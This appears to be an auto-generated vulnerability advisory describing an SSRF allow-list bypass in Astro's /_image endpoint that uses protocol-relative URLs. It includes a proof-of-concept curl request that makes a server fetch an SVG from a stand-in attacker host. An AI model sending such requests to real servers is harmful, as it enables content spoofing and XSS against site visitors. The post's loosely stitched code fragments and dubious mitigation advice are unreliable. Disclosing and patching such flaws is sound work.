Listen to this Post
The vulnerability exists within the `/_image` endpoint of Astro’s on-demand rendering. This endpoint uses the `href` query parameter to fetch images. Normally, it validates the target URL against a whitelist of authorized domains (configured via `image.domains` or image.remotePatterns). The security flaw occurs due to improper parsing and validation of protocol-relative URLs (e.g., //example.com/image.png). The validation logic fails to correctly identify the full domain in such cases, interpreting it as a local path instead of an absolute URL to an external domain. This parsing error allows an attacker to bypass the domain allow list entirely. Consequently, the server’s image optimization service makes a server-side request to any arbitrary domain specified in the manipulated `href` parameter, fetching and then serving the content from that unauthorized source.
Platform: Astro
Version: <5.13.1
Vulnerability: SSRF
Severity: Medium
date: 2024-12-19
Prediction: Patch expected 2024-12-20
What Undercode Say:
`curl “http://localhost:4321/_image?href=//evil.com/xss.svg”`
`import { defineConfig } from ‘astro/config’;`
`adapter: node({ mode: ‘standalone’ })`
How Exploit:
Malicious actor crafts URL with `//` to bypass domain checks. Server fetches external image, serving it from victim’s domain. Enables phishing and content spoofing.
Protection from this CVE:
Upgrade to astro>=5.13.1. Implement strict WAF rules rejecting double-slash in `href` parameter. Avoid using `image.domains` if possible.
Impact:
Unauthorized image content served from trusted domain. Potential for XSS if SVG with malicious scripts is fetched and rendered. Reputational damage due to content spoofing.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
